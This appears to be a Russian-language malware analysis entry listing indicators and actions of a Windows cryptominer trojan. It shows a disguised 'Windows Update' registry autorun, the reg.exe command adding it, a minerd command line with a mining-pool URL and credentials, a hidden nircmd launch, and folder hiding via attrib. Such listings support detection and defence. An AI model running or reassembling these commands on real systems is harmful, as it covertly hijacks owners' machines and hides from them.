Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Windows Update' = '%WINDIR%\syso\critical\antivirus.bat'
- '%WINDIR%\syso\critical\minerd.exe' --algo scrypt --s 6 --threads 4 --url stratum+tcp://mine.pool-x.eu:9000 --userpass hitmanuk.3:123
- '<SYSTEM32>\nircmd.exe' exec hide antivirus.bat
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Update" /t REG_SZ /d "%WINDIR%\syso\critical\antivirus.bat" /f
- '<SYSTEM32>\cmd.exe' /c antivirus.bat
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\syso\critical\sys.bat" "
- '<SYSTEM32>\attrib.exe' %WINDIR%\syso\critical +h
- %WINDIR%\syso\critical\sys.bat
- %WINDIR%\syso\critical\pthreadGC2.dll
- %WINDIR%\syso\critical\libcurl-4.dll
- %WINDIR%\syso\critical\zlib1.dll
- %WINDIR%\syso\critical\libcurl.dll
- %WINDIR%\syso\critical\antivirus.bat
- %WINDIR%\syso\critical\nircmd.exe
- %WINDIR%\syso\critical\minerd.exe
- %WINDIR%\syso\critical\nircmd.exe в <SYSTEM32>\nircmd.exe
- 'mi##.pool-x.eu':9000
- DNS ASK mi##.pool-x.eu
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'